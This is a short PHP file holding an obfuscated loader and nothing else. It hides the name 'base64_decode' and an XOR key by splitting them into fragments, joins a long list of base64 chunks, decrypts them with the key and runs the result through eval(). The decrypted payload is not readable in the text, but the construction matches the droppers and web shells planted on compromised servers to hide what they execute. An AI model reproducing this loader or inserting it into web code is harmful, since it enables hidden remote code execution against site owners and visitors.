<?php
$key = implode('', ['mys','ecr','etk','ey']);
$parts = ['AxgeA','BACBB','cORTg','dCUhF','AB4EB','xhFKQ','wNGgA','NBkUR','ExEcA','x0ARS','ICFVQ','QRQkY','Gx8MA','FIDAQ','UGDQQ','WHUUT','ExEdD','gsNHl','FaRRh','SQQAD','DApAR','x4MBx','YJERw','ECwhR','BxcWF','0lUHx','cMCFV','TQhAa','CgM7B','A0EHB','0REFV','JVB8X','DAhQS','EVHBx','YRGUV','ETV0H','DQoBS','EoIEA','sfHB0','RNgEA','BkNMQ','k0QFU','VLVhA','HDhci','SgscC','QZVOF','RWWER','NXhIB','DhsLU','0JFAk','1dBhY','GABZU','VkVdG','REaFk','5MARZ','LSEce','HB8AA','AZNVj','ggNSg','6J0UW','XE9YS','yY2OD','cnTRN','cDBBC','RTg+W','QMXBg','EGBgI','VDQQW','HToAH','RAaH0','U/PzY','+RRYB','AAYYR','QxNNT','YjN1I','vOyIr','WR0LF','hYAAA','wEHww','WAwpT','FUM9K','1QbSw','kMDRo','ADQY6','HQ9FR','E0MXQ','wHUiI','mJDAp','TTsqR','RZcDB','BLKis','pPCFF','IStFA','UUMHU','09NjY','gUExU','RlsfC','A0QDS','IeCVx','CXlkQ','WRYJE','BdFD0','tBDB4','cARZD','T0VQH','w0QHl','RNAQF','fWwcO','CRwOD','VtHQy','EgOC4','mLU0M','XU9PU','iY7Pi','stRQl','dDAdb','RTU4R','QkfHA','AGERs','VAAIK','FzIaH','BANBk','UyOSo','0TQwA','ABEBR','TU4RQ','xNMD0','rJiBF','PiQsN','00JAQ','AQERc','dGxEQ','AhcAR','SIhRQ','RLKjd','NCV0V','AgYME','QURJg','QdU1h','DB0sd','D0UuJ','TwhIE','MCSxA','EBg0C','CywMB','1JYVF','RFPj8','2JjVD','MDxUH','ksQCV','k8Nyc','3N1Qp','PFkYV','xoBQz','YgJyh','FW0FZ','KEEWA','QAGME','IQCV4','uOEpf','WxIOE','RoFOB','8JS1t','eVBZF','CwgIB','gwRFz','obBQY','cRTsy','NiYtN','TU/LV','lDWVR','KERcW','Gx4XG','ggKXB','MKFxI','HRAQJ','HVYGF','gYAFl','sYDRY','aVAYW','BgAWW','hsNCU','pQSEU','eUhUB','CQkQD','lkVEA','0RER0','EC1kB','EAUAM','BcEBg','gNKQw','NGgAN','Bk1QG','QAIGB','wAEUp','SHlRP','EREEC','l5bDh','sBEAc','ADgwL','Fk0XA','BARR0','UNHww','WSUNV','AhEFA','AsMFV','RMWFJ','BHw4c','DgILF','0VeUk','JRTEV','XTV0B','ABIHA','AcfPl','4ODAA','RDB8A','BjQLG','AAcVD','hDXEV','TTkJC','TV0AF','A9SWF','RJNjw','hPDAx','Q1hFM','jkqNE','0MAAA','RAUUj','IyArK','FkGFg','YAOho','KCBxN','NTouJ','lJaVC','csNCQ','tU1dT','UF5UT','xUYHx','geFkN','PRS9P','DhwUD','hwXBy','9eVE8','MFwsW','AEVeU','kEAAw','wKQEc','XB05M','FhEHA','BoZUV','cWEh5','JVE8V','GB8YH','hZKX1','sSDhE','aBTgf','CUtbX','lRPFx','weCRw','LEBdF','SUs+W','UoKBw','QXBxZ','TS1hH','TV4AE','AARAA','cYQlV','NXhoR','Bh8WU','0tYR0','1dGgs','FHRZY','SzhCT','REWBA','cXF1x','MJhYD','DRYLF','18xDR','sAQ00','YAxUP','GwYVH','wwWA1','YZFgw','cQl1Q','RRwOE','RxFCQ','EKGjQ','AFw4W','FwBLV','hcRGB','UWAwo','WTFhS','AAwCE','VFEQl','MYQw8','='];
$code = implode('', $parts);
$code = implode('', ['b','a','s','e','6','4','_','d','e','c','o','d','e'])($code);
$out = '';
for ($i = 0; $i < strlen($code); $i++) {
    $out .= $code[$i] ^ $key[$i % strlen($key)];
}
eval($out);
?>